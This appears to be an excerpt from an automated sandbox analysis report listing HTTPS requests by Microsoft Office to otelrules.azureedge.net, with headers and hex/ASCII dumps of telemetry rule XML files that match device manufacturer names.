                                            2024-11-18 20:16:39 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            47192.168.2.44979613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:40 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:40 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                            ETag: "0x8DC582B9748630E"
                                            x-ms-request-id: 3ed4fa9a-c01e-000b-399a-37e255000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201640Z-16547b76f7fxqj4khC1DFWpypw00000003h000000000x2va
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            48192.168.2.44979813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:40 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:40 GMT
                                            Content-Type: text/xml
                                            Content-Length: 404
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                            ETag: "0x8DC582B9E8EE0F3"
                                            x-ms-request-id: 6e95107e-e01e-0099-2a9b-37da8a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201640Z-16547b76f7f6nr89hC1DFWz7ug00000002kg00000000mafp
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:40 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            49192.168.2.44979913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:40 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:40 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                            ETag: "0x8DC582B9C8E04C8"
                                            x-ms-request-id: 0e86b0ea-b01e-0097-3ed2-374f33000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201640Z-16547b76f7fd4rc5hC1DFWkzhw00000006mg00000000b2am
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            50192.168.2.44980013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:40 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:40 GMT
                                            Content-Type: text/xml
                                            Content-Length: 428
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                            ETag: "0x8DC582BAC4F34CA"
                                            x-ms-request-id: d36f9ca3-a01e-0021-21af-36814c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201640Z-16547b76f7ftnm6xhC1DFW9c8c00000005v000000000pun4
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:40 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            51192.168.2.44980213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:41 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:40 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B988EBD12"
                                            x-ms-request-id: 6900d7da-401e-00ac-4ed2-370a97000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201640Z-16547b76f7fd4rc5hC1DFWkzhw00000006h000000000q57c
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            52192.168.2.44980113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:41 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:41 GMT
                                            Content-Type: text/xml
                                            Content-Length: 499
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                            ETag: "0x8DC582B98CEC9F6"
                                            x-ms-request-id: c577e9bc-101e-00a2-20c6-379f2e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201641Z-164f84587bf6n6jwhC1DFW90fn00000005h000000000b7xt
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:41 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            53192.168.2.44979713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:40 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:41 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:41 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                            ETag: "0x8DC582B9DACDF62"
                                            x-ms-request-id: 0e1cc1b7-001e-0066-7a9a-36561e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201641Z-164f84587bfdl84ghC1DFWuvq400000000rg000000006udg
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:41 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            54192.168.2.44980313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:41 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:41 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:41 GMT
                                            Content-Type: text/xml
                                            Content-Length: 471
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                            ETag: "0x8DC582BB5815C4C"
                                            x-ms-request-id: fa408a18-501e-0064-15b8-371f54000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201641Z-16547b76f7fr5rfnhC1DFW0am400000003tg000000009zd5
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:41 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            55192.168.2.44980613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:42 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:42 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:42 GMT
                                            Content-Type: text/xml
                                            Content-Length: 420
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                            ETag: "0x8DC582B9DAE3EC0"
                                            x-ms-request-id: 089a25c2-e01e-0052-7e86-37d9df000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201642Z-164f84587bfsgfx9hC1DFWw1as000000065000000000fw4e
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:42 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            56192.168.2.44980813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:42 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:42 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:42 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                            ETag: "0x8DC582BA909FA21"
                                            x-ms-request-id: a12cb5ef-101e-007a-7428-37047e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201642Z-164f84587bfn7ppchC1DFW45b400000000t0000000001fxh
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            57192.168.2.44980513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:42 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:42 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:42 GMT
                                            Content-Type: text/xml
                                            Content-Length: 494
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                            ETag: "0x8DC582BB8972972"
                                            x-ms-request-id: a0c6f192-101e-007a-2f09-37047e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201642Z-1866b5c5fbblmqrkhC1DFWf9ns00000004d000000000edw5
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
